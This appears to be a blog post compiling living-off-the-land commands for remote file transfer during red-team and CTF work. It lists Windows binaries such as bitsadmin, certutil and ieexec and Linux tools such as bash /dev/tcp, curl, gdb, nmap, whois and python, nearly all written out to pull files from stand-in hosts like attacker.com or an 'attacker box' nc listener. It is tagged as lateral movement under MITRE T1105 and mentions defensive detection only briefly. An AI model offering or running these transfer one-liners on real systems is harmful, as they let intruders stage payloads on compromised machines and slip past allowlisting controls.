Remote File Copy all the things!

Background

While playing a CTF I had to copy files from one machine to the next. However I was not able to do so with a non standard binary. A few, weeks, months ago, really don't remember. I watched a talk where these 2 projects being presented. These project basicly showed a lot of research being done on system binaries that can be used during Red-Team activities. Ofcourse these can also be added to your forensic artefact list should you be interested in preventing them from being used.

Windows

Linux


From these websites I found multiple other binaries that could do remote file copy and so much more. I highly recommend looking them up. To make it easier for myself and maybe you? next time we might need them I copied some of command in this post for easy access. (All credits go to the researchers of those 2 great projects)

Windows

bitsadmin

bitsadmin /create 1 bitsadmin /addfile 1 <url>/file.ext> <output Folder>\file.ext bitsadmin /RESUME 1 bitsadmin /complete 1

certutil

certutil.exe -urlcache -split -f <url>/file.ext <outputFile.ext>

Esentutl

esentutl.exe /y \\<url without www>\<file.ext> /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extrac32

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr

findstr /V /L mip9-2rnuar;gl934gmlkj \\webdavserver\folder\file.exe > c:\ADS\file.exe

Hh

HH.exe http://some.url/script.ps1

Ieexec

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

Replace

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A



Linux

Bash

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

Remote file using a TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'

CPAN

export URL=http://attacker.com/file_to_get
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();

curl

URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE

easy_install

export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(whereis python)', '$(whereis python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
pip install $TF

GDB

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' -ex quit

NMAP

Run nc target.com 12345 < "file_to_send" on the attacker

export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  local d,x=c:receive("*a");
  c:close();
  local f=io.open(os.getenv("LFILE"), "wb");
  f:write(d);
  io.close(f);' > $TF
nmap --script=$TF

php

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

whois

Run nc -l -p 12345 < "file_to_send" on the attacker box
The file has instances of $'\x0d' stripped.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE"

Run base64 "file_to_send" | nc -l -p 12345 on the attacker box

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"

Python

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'
#Red-Team #MITRE-Attack:T1105 #Remote File Copy #Lateral Movement